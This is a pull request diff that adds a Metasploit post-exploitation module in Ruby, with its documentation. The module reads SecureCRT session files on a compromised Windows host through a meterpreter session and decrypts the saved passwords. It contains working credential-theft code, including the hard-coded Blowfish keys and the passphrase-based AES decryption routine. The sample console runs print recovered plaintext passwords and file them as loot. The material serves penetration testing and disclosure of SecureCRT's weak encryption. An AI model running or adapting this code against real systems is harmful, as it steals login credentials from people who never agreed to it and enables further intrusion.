### PR TITLE
Origin/gather securecrt password

### DIFF
--- a/documentation/modules/post/windows/gather/credentials/securecrt.md
+++ b/documentation/modules/post/windows/gather/credentials/securecrt.md
@@ -1,0 +1,57 @@
+## Vulnerable Application
+
+This module can decrypt the SecureCRT, If the user chooses to remember the password.
+
+  Analysis of encryption algorithm [here](https://github.com/HyperSine/how-does-SecureCRT-encrypt-password).
+
+  You can find its official website [here](https://vandyke.com/).
+
+## Verification Steps
+
+  1. Download the latest installer of SecureCRT.
+  2. Use SecureCRT to login to ssh.
+  3. Remember to save the account password.
+  4. Get a `meterpreter` session on a Windows host.
+  5. Do: ```run post/windows/gather/credentials/securecrt```
+  6. If the session file is saved in the system, the host, port, user name and plaintext password will be printed.
+
+## Options
+
+ **Passphrase**
+
+  - Specify user's master password, e.g.:123456'
+
+## Scenarios
+
+```
+[*] Gather Securecrt Passwords on WIN-LHC82CUIV7U
+[*] Search session files on C:\Users\Administrator\AppData\Roaming\VanDyke\Config\Sessions
+[-] Maybe the user has set the passphrase, please try to provide the [Passphrase] to decrypt again.
+Securecrt Password
+==================
+
+Filename          Hostname      Port  Username   Password
+--------          --------      ----  --------   --------
+192.168.56.1.ini  192.168.56.1  22    kali-team  
+
+[+] Passwords stored in: /home/kali-team/.msf4/loot/20200911115103_default_10.0.2.15_host.securecrt_p_489607.txt
+
+```
+
+* Specify **Passphrase**
+
+```
+meterpreter > run post/windows/gather/credentials/securecrt Passphrase=123456
+
+[*] Gather Securecrt Passwords on WIN-LHC82CUIV7U
+[*] Search session files on C:\Users\Administrator\AppData\Roaming\VanDyke\Config\Sessions
+Securecrt Password
+==================
+
+Filename          Hostname      Port  Username   Password
+--------          --------      ----  --------   --------
+192.168.56.1.ini  192.168.56.1  22    kali-team  123456789
+
+[+] Passwords stored in: /home/kali-team/.msf4/loot/20200911115118_default_10.0.2.15_host.securecrt_p_954887.txt
+
+```

--- a/documentation/modules/post/windows/gather/credentials/securecrt.md
+++ b/documentation/modules/post/windows/gather/credentials/securecrt.md
@@ -1,7 +1,7 @@
 ## Vulnerable Application
 
-All [SecureCRT](https://www.vandyke.com/cgi-bin/releases.php?product=securecrt) installations are affected, regardless 
-of which OS they are installed on, since they all use the same encryption mechanisms described by HyperSine in 
+All [SecureCRT](https://www.vandyke.com/cgi-bin/releases.php?product=securecrt) installations are affected, regardless
+of which OS they are installed on, since they all use the same encryption mechanisms described by HyperSine in
 his [GitHub paper](https://github.com/HyperSine/how-does-SecureCRT-encrypt-password).
 Note that at the moment this module only supports exploiting Windows machines.
 
@@ -11,13 +11,14 @@ local computer, allowing them to easily restart a session without having to reen
 the host, username, and password. These details are stored in a local session file, and SecureCRT will additionally
 encrypt the password with AES encryption.
 
-Unfortunately for SecureCRT users, the encryption mechanism used uses a weak IV of all 0's, and the encryption keys 
-that are utilized to encrypt the passwords have been publicly reversed and documented by HyperSine in [his GitHub paper](https://github.com/HyperSine/how-does-SecureCRT-encrypt-password).
+Unfortunately for SecureCRT users, the encryption mechanism used uses a weak IV of all 0's, and the encryption
+keys that are utilized to encrypt the passwords have been publicly reversed and documented by HyperSine
+in [his GitHub paper](https://github.com/HyperSine/how-does-SecureCRT-encrypt-password).
 
 In addition, HyperSine also published a PoC script that allows users to decrypt SecureCRT session files, regardless
 of the version of SecureCRT installed. The only limitation is that users must know the SecureCRT configuration password
-if one was set at installation. At the time of writing, September 11, 2020, it appears that Vandyke, the creators of 
-SecureCRT, have still not changed the implementation details for this session encryption algorithm. 
+if one was set at installation. At the time of writing, September 11, 2020, it appears that Vandyke, the creators of
+SecureCRT, have still not changed the implementation details for this session encryption algorithm.
 
 This module ports the work from HyperSine and implements it in a Metasploit module that allows users to easily retrieve
 any SecureCRT session files from a compromised Windows machine and then decrypt the session passwords where its possible
@@ -28,49 +29,48 @@ it can be decrypted.
 
 1. Download the latest installer of SecureCRT from https://www.vandyke.com/cgi-bin/releases.php?product=securecrt.
    You will need a valid login, which can be obtained by completing the registration form at
-   https://www.vandyke.com/cgi-bin/download_application.php?pid=scrt_x64_873&force=1, after which an 
+   https://www.vandyke.com/cgi-bin/download_application.php?pid=scrt_x64_873&force=1, after which an
    email will be sent to you with the valid login details.
 2. Follow the installer's prompts to install the software. Select all the default settings.
-3. Once everything has been installed, start SecureCRT. A prompt will appear asking if one wants to set a 
-   configuration passphrase to encrypt sensitive data such as saved passwords and login actions. Set a 
+3. Once everything has been installed, start SecureCRT. A prompt will appear asking if one wants to set a
+   configuration passphrase to encrypt sensitive data such as saved passwords and login actions. Set a
    passphrase of your choice here, but be sure to remember it.
-4. Set up a SSH server on your target. For Windows 10 v1809 and later and 
+4. Set up a SSH server on your target. For Windows 10 v1809 and later and
    Windows Server 2019 and later, this can be done by running the PowerShell
    command `Add-WindowsCapability -Online -Name OpenSSH.Server~~~~0.0.1.0`,
    followed by `Start-Service sshd`.
 
 ## Verification Steps
 
-  1. Use SecureCRT to login to a SSH server of your choosing. When logging in, 
-     remember to select the check boxes to save the username (should be selected 
+  1. Use SecureCRT to login to a SSH server of your choosing. When logging in,
+     remember to select the check boxes to save the username (should be selected
      by default), as well as the checkbox to save the account password.
   3. Get a `meterpreter` session on the Windows host running SecureCRT.
   4. Do: `run post/windows/gather/credentials/securecrt`
-  5. Optional: Run `set PASSPHRASE *SecureCRT configuration passphrase*` if a configuration 
-     passphrase was set for SecureCRT and you are aware of what its value is. 
-  5. If the session file was saved on the target, the module will print out the details 
-     of the host and port that the user connected to, as well as which username the user 
+  5. Optional: Run `set PASSPHRASE *SecureCRT configuration passphrase*` if a configuration
+     passphrase was set for SecureCRT and you are aware of what its value is.
+  5. If the session file was saved on the target, the module will print out the details
+     of the host and port that the user connected to, as well as which username the user
      signed in with and the plaintext version of the password that was used.
 
 ## Options
 
- **PASSPHRASE**
-
-  The configuration password that was set when SecureCRT was installed, if one was supplied.
-  Note that if this value is not supplied and SecureCRT was set up to use a configuration password, 
-  it will not be possible to decrypt the encrypted SecureCRT passwords that are retrieved.
+### PASSPHRASE
+The configuration password that was set when SecureCRT was installed, if one was supplied.
+Note that if this value is not supplied and SecureCRT was set up to use a configuration password,
+it will not be possible to decrypt the encrypted SecureCRT passwords that are retrieved.
 
 ## Scenarios
 
 ### Windows Server 2019 Standard Edition with SecureCRT v8.7.3 Build 2279 (Configuration Password Enabled)
 ```
-msf6 exploit(multi/handler) > use post/windows/gather/credentials/securecrt 
+msf6 exploit(multi/handler) > use post/windows/gather/credentials/securecrt
 msf6 post(windows/gather/credentials/securecrt) > info
 
        Name: Windows SecureCRT Session Information Enumeration
      Module: post/windows/gather/credentials/securecrt
    Platform: Windows
-       Arch: 
+       Arch:
        Rank: Normal
 
 Provided by:
@@ -87,18 +87,18 @@ Basic options:
   SESSION                       yes       The session to run this module on.
 
 Description:
-  This module will determine if SecureCRT is installed on the target 
-  system and, if it is, it will try to dump all saved session 
-  information from the target. The passwords for these saved sessions 
-  will then be decrypted where possible, using the decryption 
-  information that HyperSine reverse engineered. Note that whilst 
-  SecureCRT has installers for Linux, Mac and Windows, this module 
+  This module will determine if SecureCRT is installed on the target
+  system and, if it is, it will try to dump all saved session
+  information from the target. The passwords for these saved sessions
+  will then be decrypted where possible, using the decryption
+  information that HyperSine reverse engineered. Note that whilst
+  SecureCRT has installers for Linux, Mac and Windows, this module
   presently only works on Windows.
 
 References:
   https://github.com/HyperSine/how-does-SecureCRT-encrypt-password/blob/master/doc/how-does-SecureCRT-encrypt-password.md
 
-msf6 post(windows/gather/credentials/securecrt) > set SESSION 1 
+msf6 post(windows/gather/credentials/securecrt) > set SESSION 1
 SESSION => 1
 msf6 post(windows/gather/credentials/securecrt) > set Passphrase whatabadpassword
 Passphrase => whatabadpassword
@@ -113,21 +113,21 @@ Filename           Protocol  Hostname   Port  Username              Password
 --------           --------  --------   ----  --------              --------
 127.0.0.1 (1).ini  telnet    127.0.0.1  23    RAPID7\Administrator  thePassword123!
 127.0.0.1 (2).ini  ssh2      127.0.0.1  22    Administrator         thePassword123!
-127.0.0.1 (3).ini  ssh2      127.0.0.1  22    Administrator         
-127.0.0.1.ini      telnet    127.0.0.1  23                          
+127.0.0.1 (3).ini  ssh2      127.0.0.1  22    Administrator
+127.0.0.1.ini      telnet    127.0.0.1  23
 
 msf6 post(windows/gather/credentials/securecrt) >
 ```
 
 ### Windows Server 2019 Standard Edition with SecureCRT v8.7.3 Build 2279 (Configuration Password Enabled, But No Password Provided)
 ```
-msf6 exploit(multi/handler) > use post/windows/gather/credentials/securecrt 
+msf6 exploit(multi/handler) > use post/windows/gather/credentials/securecrt
 msf6 post(windows/gather/credentials/securecrt) > info
 
        Name: Windows SecureCRT Session Information Enumeration
      Module: post/windows/gather/credentials/securecrt
    Platform: Windows
-       Arch: 
+       Arch:
        Rank: Normal
 
 Provided by:
@@ -144,18 +144,18 @@ Basic options:
   SESSION                       yes       The session to run this module on.
 
 Description:
-  This module will determine if SecureCRT is installed on the target 
-  system and, if it is, it will try to dump all saved session 
-  information from the target. The passwords for these saved sessions 
-  will then be decrypted where possible, using the decryption 
-  information that HyperSine reverse engineered. Note that whilst 
-  SecureCRT has installers for Linux, Mac and Windows, this module 
+  This module will determine if SecureCRT is installed on the target
+  system and, if it is, it will try to dump all saved session
+  information from the target. The passwords for these saved sessions
+  will then be decrypted where possible, using the decryption
+  information that HyperSine reverse engineered. Note that whilst
+  SecureCRT has installers for Linux, Mac and Windows, this module
   presently only works on Windows.
 
 References:
   https://github.com/HyperSine/how-does-SecureCRT-encrypt-password/blob/master/doc/how-does-SecureCRT-encrypt-password.md
 
-msf6 post(windows/gather/credentials/securecrt) > set SESSION 1 
+msf6 post(windows/gather/credentials/securecrt) > set SESSION 1
 SESSION => 1
 msf6 post(windows/gather/credentials/securecrt) > run
 
@@ -168,7 +168,7 @@ SecureCRT Sessions
 
 Filename       Hostname   Port  Username              Password
 --------       --------   ----  --------              --------
-127.0.0.1.ini  127.0.0.1  22    RAPID7\Administrator  
+127.0.0.1.ini  127.0.0.1  22    RAPID7\Administrator
 
 [+] Session info stored in: /home/gwillcox/.msf4/loot/20200911125521_default_172.20.150.24_host.securecrt_s_951139.txt
 [*] Post module execution completed

--- a/documentation/modules/post/windows/gather/credentials/securecrt.md
+++ b/documentation/modules/post/windows/gather/credentials/securecrt.md
@@ -105,16 +105,17 @@ Passphrase => whatabadpassword
 msf6 post(windows/gather/credentials/securecrt) > run
 
 [*] Gathering SecureCRT session information from WIN-M5JU6L5RA9L
-[*] Searching for session files in C:\Users\Administrator\AppData\Roaming\VanDyke\Config\Sessions
+[*] Searching for session files in C:\Users\normal\AppData\Roaming\VanDyke\Config\Sessions
 SecureCRT Sessions
 ==================
 
-Filename       Hostname   Port  Username              Password
---------       --------   ----  --------              --------
-127.0.0.1.ini  127.0.0.1  22    RAPID7\Administrator  thePassword123!
+Filename           Protocol  Hostname   Port  Username              Password
+--------           --------  --------   ----  --------              --------
+127.0.0.1 (1).ini  telnet    127.0.0.1  23    RAPID7\Administrator  thePassword123!
+127.0.0.1 (2).ini  ssh2      127.0.0.1  22    Administrator         thePassword123!
+127.0.0.1 (3).ini  ssh2      127.0.0.1  22    Administrator         
+127.0.0.1.ini      telnet    127.0.0.1  23                          
 
-[+] Session info stored in: /home/gwillcox/.msf4/loot/20200911125545_default_172.20.150.24_host.securecrt_s_504557.txt
-[*] Post module execution completed
 msf6 post(windows/gather/credentials/securecrt) >
 ```
 

--- a/documentation/modules/post/windows/gather/credentials/securecrt.md
+++ b/documentation/modules/post/windows/gather/credentials/securecrt.md
@@ -1,57 +1,175 @@
 ## Vulnerable Application
 
-This module can decrypt the SecureCRT, If the user chooses to remember the password.
+All [SecureCRT](https://www.vandyke.com/cgi-bin/releases.php?product=securecrt) installations are affected, regardless 
+of which OS they are installed on, since they all use the same encryption mechanisms described by HyperSine in 
+his [GitHub paper](https://github.com/HyperSine/how-does-SecureCRT-encrypt-password).
+Note that at the moment this module only supports exploiting Windows machines.
 
-  Analysis of encryption algorithm [here](https://github.com/HyperSine/how-does-SecureCRT-encrypt-password).
+### Overview
+All versions of SecureCRT have an option to allow users to store an encrypted copy of their session information on the
+local computer, allowing them to easily restart a session without having to reenter all the connection details such as
+the host, username, and password. These details are stored in a local session file, and SecureCRT will additionally
+encrypt the password with AES encryption.
 
-  You can find its official website [here](https://vandyke.com/).
+Unfortunately for SecureCRT users, the encryption mechanism used uses a weak IV of all 0's, and the encryption keys 
+that are utilized to encrypt the passwords have been publicly reversed and documented by HyperSine in [his GitHub paper](https://github.com/HyperSine/how-does-SecureCRT-encrypt-password).
+
+In addition, HyperSine also published a PoC script that allows users to decrypt SecureCRT session files, regardless
+of the version of SecureCRT installed. The only limitation is that users must know the SecureCRT configuration password
+if one was set at installation. At the time of writing, September 11, 2020, it appears that Vandyke, the creators of 
+SecureCRT, have still not changed the implementation details for this session encryption algorithm. 
+
+This module ports the work from HyperSine and implements it in a Metasploit module that allows users to easily retrieve
+any SecureCRT session files from a compromised Windows machine and then decrypt the session passwords where its possible
+to do so. All session information retrieved will be stored a Metasploit loot file, along with the password if
+it can be decrypted.
+
+### Setup Steps
+
+1. Download the latest installer of SecureCRT from https://www.vandyke.com/cgi-bin/releases.php?product=securecrt.
+   You will need a valid login, which can be obtained by completing the registration form at
+   https://www.vandyke.com/cgi-bin/download_application.php?pid=scrt_x64_873&force=1, after which an 
+   email will be sent to you with the valid login details.
+2. Follow the installer's prompts to install the software. Select all the default settings.
+3. Once everything has been installed, start SecureCRT. A prompt will appear asking if one wants to set a 
+   configuration passphrase to encrypt sensitive data such as saved passwords and login actions. Set a 
+   passphrase of your choice here, but be sure to remember it.
+4. Set up a SSH server on your target. For Windows 10 v1809 and later and 
+   Windows Server 2019 and later, this can be done by running the PowerShell
+   command `Add-WindowsCapability -Online -Name OpenSSH.Server~~~~0.0.1.0`,
+   followed by `Start-Service sshd`.
 
 ## Verification Steps
 
-  1. Download the latest installer of SecureCRT.
-  2. Use SecureCRT to login to ssh.
-  3. Remember to save the account password.
-  4. Get a `meterpreter` session on a Windows host.
-  5. Do: ```run post/windows/gather/credentials/securecrt```
-  6. If the session file is saved in the system, the host, port, user name and plaintext password will be printed.
+  1. Use SecureCRT to login to a SSH server of your choosing. When logging in, 
+     remember to select the check boxes to save the username (should be selected 
+     by default), as well as the checkbox to save the account password.
+  3. Get a `meterpreter` session on the Windows host running SecureCRT.
+  4. Do: `run post/windows/gather/credentials/securecrt`
+  5. Optional: Run `set PASSPHRASE *SecureCRT configuration passphrase*` if a configuration 
+     passphrase was set for SecureCRT and you are aware of what its value is. 
+  5. If the session file was saved on the target, the module will print out the details 
+     of the host and port that the user connected to, as well as which username the user 
+     signed in with and the plaintext version of the password that was used.
 
 ## Options
 
- **Passphrase**
+ **PASSPHRASE**
 
-  - Specify user's master password, e.g.:123456'
+  The configuration password that was set when SecureCRT was installed, if one was supplied.
+  Note that if this value is not supplied and SecureCRT was set up to use a configuration password, 
+  it will not be possible to decrypt the encrypted SecureCRT passwords that are retrieved.
 
 ## Scenarios
 
+### Windows Server 2019 Standard Edition with SecureCRT v8.7.3 Build 2279 (Configuration Password Enabled)
 ```
-[*] Gather Securecrt Passwords on WIN-LHC82CUIV7U
-[*] Search session files on C:\Users\Administrator\AppData\Roaming\VanDyke\Config\Sessions
-[-] Maybe the user has set the passphrase, please try to provide the [Passphrase] to decrypt again.
-Securecrt Password
+msf6 exploit(multi/handler) > use post/windows/gather/credentials/securecrt 
+msf6 post(windows/gather/credentials/securecrt) > info
+
+       Name: Windows SecureCRT Session Information Enumeration
+     Module: post/windows/gather/credentials/securecrt
+   Platform: Windows
+       Arch: 
+       Rank: Normal
+
+Provided by:
+  HyperSine
+  Kali-Team <kali-team@qq.com>
+
+Compatible session types:
+  Meterpreter
+
+Basic options:
+  Name        Current Setting   Required  Description
+  ----        ---------------   --------  -----------
+  PASSPHRASE                    no        The configuration password that was set when SecureCRT was installed, if one was supplied
+  SESSION                       yes       The session to run this module on.
+
+Description:
+  This module will determine if SecureCRT is installed on the target 
+  system and, if it is, it will try to dump all saved session 
+  information from the target. The passwords for these saved sessions 
+  will then be decrypted where possible, using the decryption 
+  information that HyperSine reverse engineered. Note that whilst 
+  SecureCRT has installers for Linux, Mac and Windows, this module 
+  presently only works on Windows.
+
+References:
+  https://github.com/HyperSine/how-does-SecureCRT-encrypt-password/blob/master/doc/how-does-SecureCRT-encrypt-password.md
+
+msf6 post(windows/gather/credentials/securecrt) > set SESSION 1 
+SESSION => 1
+msf6 post(windows/gather/credentials/securecrt) > set Passphrase whatabadpassword
+Passphrase => whatabadpassword
+msf6 post(windows/gather/credentials/securecrt) > run
+
+[*] Gathering SecureCRT session information from WIN-M5JU6L5RA9L
+[*] Searching for session files in C:\Users\Administrator\AppData\Roaming\VanDyke\Config\Sessions
+SecureCRT Sessions
 ==================
 
-Filename          Hostname      Port  Username   Password
---------          --------      ----  --------   --------
-192.168.56.1.ini  192.168.56.1  22    kali-team  
+Filename       Hostname   Port  Username              Password
+--------       --------   ----  --------              --------
+127.0.0.1.ini  127.0.0.1  22    RAPID7\Administrator  thePassword123!
 
-[+] Passwords stored in: /home/kali-team/.msf4/loot/20200911115103_default_10.0.2.15_host.securecrt_p_489607.txt
-
+[+] Session info stored in: /home/gwillcox/.msf4/loot/20200911125545_default_172.20.150.24_host.securecrt_s_504557.txt
+[*] Post module execution completed
+msf6 post(windows/gather/credentials/securecrt) >
 ```
 
-* Specify **Passphrase**
-
+### Windows Server 2019 Standard Edition with SecureCRT v8.7.3 Build 2279 (Configuration Password Enabled, But No Password Provided)
 ```
-meterpreter > run post/windows/gather/credentials/securecrt Passphrase=123456
+msf6 exploit(multi/handler) > use post/windows/gather/credentials/securecrt 
+msf6 post(windows/gather/credentials/securecrt) > info
 
-[*] Gather Securecrt Passwords on WIN-LHC82CUIV7U
-[*] Search session files on C:\Users\Administrator\AppData\Roaming\VanDyke\Config\Sessions
-Securecrt Password
+       Name: Windows SecureCRT Session Information Enumeration
+     Module: post/windows/gather/credentials/securecrt
+   Platform: Windows
+       Arch: 
+       Rank: Normal
+
+Provided by:
+  HyperSine
+  Kali-Team <kali-team@qq.com>
+
+Compatible session types:
+  Meterpreter
+
+Basic options:
+  Name        Current Setting   Required  Description
+  ----        ---------------   --------  -----------
+  PASSPHRASE                    no        The configuration password that was set when SecureCRT was installed, if one was supplied
+  SESSION                       yes       The session to run this module on.
+
+Description:
+  This module will determine if SecureCRT is installed on the target 
+  system and, if it is, it will try to dump all saved session 
+  information from the target. The passwords for these saved sessions 
+  will then be decrypted where possible, using the decryption 
+  information that HyperSine reverse engineered. Note that whilst 
+  SecureCRT has installers for Linux, Mac and Windows, this module 
+  presently only works on Windows.
+
+References:
+  https://github.com/HyperSine/how-does-SecureCRT-encrypt-password/blob/master/doc/how-does-SecureCRT-encrypt-password.md
+
+msf6 post(windows/gather/credentials/securecrt) > set SESSION 1 
+SESSION => 1
+msf6 post(windows/gather/credentials/securecrt) > run
+
+[*] Gathering SecureCRT session information from WIN-M5JU6L5RA9L
+[*] Searching for session files in C:\Users\Administrator\AppData\Roaming\VanDyke\Config\Sessions
+[-] It seems the user set a configuration password when installing SecureCRT!
+[-] If you know the configuration password, please provide it via the PASSPHRASE option and then run the module again.
+SecureCRT Sessions
 ==================
 
-Filename          Hostname      Port  Username   Password
---------          --------      ----  --------   --------
-192.168.56.1.ini  192.168.56.1  22    kali-team  123456789
+Filename       Hostname   Port  Username              Password
+--------       --------   ----  --------              --------
+127.0.0.1.ini  127.0.0.1  22    RAPID7\Administrator  
 
-[+] Passwords stored in: /home/kali-team/.msf4/loot/20200911115118_default_10.0.2.15_host.securecrt_p_954887.txt
-
+[+] Session info stored in: /home/gwillcox/.msf4/loot/20200911125521_default_172.20.150.24_host.securecrt_s_951139.txt
+[*] Post module execution completed
+msf6 post(windows/gather/credentials/securecrt) >
 ```

--- a/modules/post/windows/gather/credentials/securecrt.rb
+++ b/modules/post/windows/gather/credentials/securecrt.rb
@@ -131,6 +131,11 @@ class MetasploitModule < Msf::Post
   end
 
   def securecrt_store_config(config)
+    if config[:hostname].to_s.empty? || config[:service_name].to_s.empty? || config[:port].to_s.empty? || config[:username].to_s.empty? || config[:password].nil?
+      return # If any of these fields are nil or are empty (with the exception of the password field which can be empty), 
+             # then we shouldn't proceed, as we don't have enough info to store a credential which someone could actually
+             # use against a target.
+    end
     service_data = {
       address: config[:hostname],
       port: config[:port],
@@ -178,11 +183,11 @@ class MetasploitModule < Msf::Post
           file_name: item[:file_name],
           hostname: item[:hostname],
           service_name: item[:protocol],
-          port: item[:port].to_i,
+          port: item[:port].nil? ? '' : item[:port].to_i,
           username: item[:username],
           password: item[:password]
         }
-        securecrt_store_config(config) if ((!config[:hostname].nil? && !config[:hostname].empty?) && (config[:port] != 0) && (!config[:username].nil? && !config[:username].empty?) && (!config[:password].nil?))
+        securecrt_store_config(config)
       end
       print_line(tbl.to_s)
       if tbl.rows.count

--- a/modules/post/windows/gather/credentials/securecrt.rb
+++ b/modules/post/windows/gather/credentials/securecrt.rb
@@ -1,0 +1,189 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+class MetasploitModule < Msf::Post
+  include Msf::Post::File
+  include Msf::Post::Windows::Registry
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Windows Gather Securecrt Passwords',
+        'Description' => %q{
+          This module can decrypt the password of Securecrt,
+          if the user chooses to remember the password.
+        },
+        'License' => MSF_LICENSE,
+        'References' => [
+          [ 'URL', 'https://github.com/HyperSine/how-does-SecureCRT-encrypt-password/blob/master/doc/how-does-SecureCRT-encrypt-password.md']
+        ],
+        'Author' => [
+          'Kali-Team <kali-team[at]qq.com>'
+        ],
+        'Platform' => [ 'win' ],
+        'SessionTypes' => [ 'meterpreter' ]
+      )
+    )
+    register_options(
+      [
+        OptString.new('MASTER_PASSWORD', [ false, 'If the user sets the master password, e.g.:123456']),
+      ]
+    )
+  end
+
+  def blowfish_decrypt(secret_key, text)
+    cipher = OpenSSL::Cipher.new('bf-cbc').decrypt
+    cipher.padding = 0
+    cipher.key_len = secret_key.length
+    cipher.key     = secret_key
+    cipher.iv= "\x00" * 8
+    cipher.update(text) + cipher.final
+  end
+
+  def try_encode_file(data)
+    if data[0].unpack('C') == [255] && data[1].unpack('C') == [254]
+      data[2..-1].force_encoding('UTF-16LE').encode('UTF-8')
+    elsif data[0].unpack('C') == [254] && data[1].unpack('C') == [187] && data[2].unpack('C') == [191]
+      data
+    elsif data[0].unpack('C') == [254] && data[1].unpack('C') == [255]
+      data[2..-1].force_encoding('UTF-16BE').encode('UTF-8')
+    else
+      data
+    end
+  end
+
+  def enum_session_file(path)
+    config_ini = []
+    tbl = []
+    print_status("Search session files on #{path}")
+    config_ini += session.fs.file.search(path, '*.ini')
+
+    # enum session file
+    config_ini.each do |item|
+      file_name = item['path'] + session.fs.file.separator + item['name']
+      file_contents = read_file(file_name) if not ['__FolderData__.ini','Default.ini'].include?(item['name'])
+      if file_contents.nil? || file_contents.empty?
+        next
+      end
+      file = try_encode_file(file_contents)
+      hostname = $1 if Regexp.compile('S:"Hostname"=([^\r\n]*)').match(file)
+      password = securecrt_crypto($1) if Regexp.compile('S:"Password"=u([0-9a-f]+)').match(file)
+      passwordv2 = securecrt_crypto_v2($1) if Regexp.compile('S:"Password V2"=02:([0-9a-f]+)').match(file)
+      port = $1.to_i(16).to_s if Regexp.compile('D:"\[SSH2\] Port"=([0-9a-f]{8})').match(file)
+      username = $1 if  Regexp.compile('S:"Username"=([^\r\n]*)').match(file)
+      tbl << {
+        file_name: item['name'],
+        hostname: hostname,
+        port: port,
+        username: username,
+        password: password || passwordv2,
+      }
+    end
+    return tbl
+  end
+
+  def securecrt_crypto(ciphertext)  
+    key1 = "\x24\xA6\x3D\xDE\x5B\xD3\xB3\x82\x9C\x7E\x06\xF4\x08\x16\xAA\x07"
+    key2 = "\x5F\xB0\x45\xA2\x94\x17\xD9\x16\xC6\xC6\xA2\xFF\x06\x41\x82\xB7"
+    ciphered_bytes = [ciphertext].pack('H*')
+    cipher_tmp = blowfish_decrypt(key1,ciphered_bytes)[4..-5]
+    padded_plain_bytes = blowfish_decrypt(key2,cipher_tmp)
+    i = 0
+    (0..padded_plain_bytes.length).step(2) {|i|
+      if (padded_plain_bytes[i] == "\x00" && padded_plain_bytes[i + 1] == "\x00")
+        return padded_plain_bytes[0..i-1].force_encoding("UTF-16LE").encode('UTF-8')
+      end
+    }
+  end
+
+  def securecrt_crypto_v2(ciphertext)
+    iv =("\x00" * 16)
+    config_passphrase =  datastore['Passphrase'] || nil
+    key = OpenSSL::Digest::SHA256.new(config_passphrase).digest
+    aes = OpenSSL::Cipher.new('AES-256-CBC')
+    aes.key = key
+    aes.padding = 0
+    aes.decrypt
+    aes.iv = iv
+    padded_plain_bytes = aes.update([ciphertext].pack('H*'))
+    plain_bytes_length= padded_plain_bytes[0,4].unpack1('l') # bytes to int little-endian format.
+    plain_bytes = padded_plain_bytes[4,plain_bytes_length]
+    plain_bytes_digest = padded_plain_bytes[4 + plain_bytes_length,32]
+    if(OpenSSL::Digest::SHA256.new(plain_bytes).digest == plain_bytes_digest) # verity
+      return plain_bytes.force_encoding('UTF-8')
+    end
+    print_error("Maybe the user has set the passphrase, please try to provide the [Passphrase] to decrypt again.")
+    return nil
+  end
+
+  def securecrt_store_config(config)
+    service_data = {
+      address: config[:hostname],
+      port: config[:port],
+      service_name: 'ssh',
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      origin_type: :session,
+      session_id: session_db_id,
+      post_reference_name: refname,
+      private_type: :password,
+      private_data: config[:password],
+      username: config[:username]
+    }.merge(service_data)
+
+    credential_core = create_credential(credential_data)
+
+    login_data = {
+      core: credential_core,
+      status: Metasploit::Model::Login::Status::UNTRIED
+    }.merge(service_data)
+
+    create_credential_login(login_data)
+  end
+
+  def run
+    print_status("Gather Securecrt Passwords on #{sysinfo['Computer']}")
+    # HKEY_CURRENT_USER\Software\VanDyke\SecureCRT
+    result = []
+    parent_key = "HKEY_CURRENT_USER\\Software\\VanDyke\\SecureCRT"
+    # get session file path
+    securecrt_path = expand_path(registry_getvaldata(parent_key, 'Config Path') + session.fs.file.separator + "Sessions")
+    if securecrt_path
+      result = enum_session_file(securecrt_path)
+      columns = [
+        'Filename',
+        'Hostname',
+        'Port',
+        'Username',
+        'Password',
+      ]
+      tbl = Rex::Text::Table.new(
+        'Header' => 'Securecrt Password',
+        'Columns' => columns
+      )
+      result.each do |item|
+        tbl << item.values
+        config = {
+          file_name: item[:file_name],
+          hostname: item[:hostname],
+          port: item[:port].to_i,
+          username: item[:username],
+          password: item[:password]
+        }
+        securecrt_store_config(config)
+      end
+      print_line(tbl.to_s)
+      if tbl.rows.count
+        path = store_loot('host.securecrt_password', 'text/plain', session, tbl, 'securecrt_password.txt', 'SecureCRT Passwords')
+        print_good("Passwords stored in: #{path}")
+      end
+    else
+      print_error("Session path not found")
+    end
+  end
+end

--- a/modules/post/windows/gather/credentials/securecrt.rb
+++ b/modules/post/windows/gather/credentials/securecrt.rb
@@ -182,7 +182,7 @@ class MetasploitModule < Msf::Post
           username: item[:username],
           password: item[:password]
         }
-        securecrt_store_config(config) if (config[:hostname] && config[:port] && config[:username] && config[:password])
+        securecrt_store_config(config) if ((!config[:hostname].nil? && !config[:hostname].empty?) && (config[:port] != 0) && (!config[:username].nil? && !config[:username].empty?) && (!config[:password].nil?))
       end
       print_line(tbl.to_s)
       if tbl.rows.count

--- a/modules/post/windows/gather/credentials/securecrt.rb
+++ b/modules/post/windows/gather/credentials/securecrt.rb
@@ -132,10 +132,11 @@ class MetasploitModule < Msf::Post
 
   def securecrt_store_config(config)
     if config[:hostname].to_s.empty? || config[:service_name].to_s.empty? || config[:port].to_s.empty? || config[:username].to_s.empty? || config[:password].nil?
-      return # If any of these fields are nil or are empty (with the exception of the password field which can be empty), 
-             # then we shouldn't proceed, as we don't have enough info to store a credential which someone could actually
-             # use against a target.
+      return # If any of these fields are nil or are empty (with the exception of the password field which can be empty),
+      # then we shouldn't proceed, as we don't have enough info to store a credential which someone could actually
+      # use against a target.
     end
+
     service_data = {
       address: config[:hostname],
       port: config[:port],

--- a/modules/post/windows/gather/credentials/securecrt.rb
+++ b/modules/post/windows/gather/credentials/securecrt.rb
@@ -28,7 +28,7 @@ class MetasploitModule < Msf::Post
     )
     register_options(
       [
-        OptString.new('MASTER_PASSWORD', [ false, 'If the user sets the master password, e.g.:123456']),
+        OptString.new('Passphrase', [ false, 'If the user sets the master password, e.g.:123456']),
       ]
     )
   end
@@ -37,8 +37,8 @@ class MetasploitModule < Msf::Post
     cipher = OpenSSL::Cipher.new('bf-cbc').decrypt
     cipher.padding = 0
     cipher.key_len = secret_key.length
-    cipher.key     = secret_key
-    cipher.iv= "\x00" * 8
+    cipher.key = secret_key
+    cipher.iv = "\x00" * 8
     cipher.update(text) + cipher.final
   end
 
@@ -63,44 +63,44 @@ class MetasploitModule < Msf::Post
     # enum session file
     config_ini.each do |item|
       file_name = item['path'] + session.fs.file.separator + item['name']
-      file_contents = read_file(file_name) if not ['__FolderData__.ini','Default.ini'].include?(item['name'])
+      file_contents = read_file(file_name) if !['__FolderData__.ini', 'Default.ini'].include?(item['name'])
       if file_contents.nil? || file_contents.empty?
         next
       end
+
       file = try_encode_file(file_contents)
-      hostname = $1 if Regexp.compile('S:"Hostname"=([^\r\n]*)').match(file)
-      password = securecrt_crypto($1) if Regexp.compile('S:"Password"=u([0-9a-f]+)').match(file)
